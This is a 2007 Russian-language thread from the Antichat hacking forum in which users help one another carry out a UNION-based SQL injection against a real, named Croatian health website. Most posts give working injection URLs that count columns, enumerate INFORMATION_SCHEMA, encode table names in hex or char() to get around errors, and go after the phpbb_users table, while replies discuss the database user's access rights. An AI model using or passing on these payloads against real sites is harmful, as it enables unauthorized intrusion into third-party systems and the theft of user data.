ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql выдает ошибку
  #1  
Старый 29.08.2007, 17:18
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию sql выдает ошибку

_http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES/*

есть такой скуль. там выводит таблицу phpbb, и так я знаю впринципе что он там есть, но приобращении.
http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,2,3+from+phpbb/*
или же
_http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+phpbb/*
выдает ошибку
 
Ответить с цитированием

  #2  
Старый 29.08.2007, 17:23
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

13 столбцов.
 
Ответить с цитированием

  #3  
Старый 29.08.2007, 17:29
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

Где именно что то я не очень понял
 
Ответить с цитированием

  #4  
Старый 29.08.2007, 17:35
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*
гугл, антибоян
 
Ответить с цитированием

  #5  
Старый 29.08.2007, 17:42
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

Это я и так знал... я не про это спрашивал... при обращении phpbb_users ошибку выдает
 
Ответить с цитированием

  #6  
Старый 29.08.2007, 17:52
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Ищи, в какой БД таблица лежит
 
Ответить с цитированием

  #7  
Старый 29.08.2007, 17:55
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Код:
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
ТС, вообщето:
Код:
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,имя_столбца,5,6,7,8,9,10,11+from+имя_таблицы/*
А не просто имя_таблицы

Последний раз редактировалось NOmeR1; 29.08.2007 в 18:00..
 
Ответить с цитированием

  #8  
Старый 29.08.2007, 17:59
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*
--> phpbb_users

Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*
--> beracivi

Однако,

Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+beracivi.phpbb_users/*
Не катит...
 
Ответить с цитированием

  #9  
Старый 29.08.2007, 18:04
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Видимо текущему MySQL юзеру запрещен доступ к БД beracivi
 
Ответить с цитированием

  #10  
Старый 29.08.2007, 18:19
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+concat(table_schema,char(46),table_name),2,3,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+where+table_name=0x70687062625f7573657273+limit+22,1/*
Там 22 Базы Данных содержат таблицу phpbb_users и далеко не факт что БД, используемая этим сайтом содержит эту таблицу. На просмотр БД других сайтов у этого пользователя прав не хватает.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ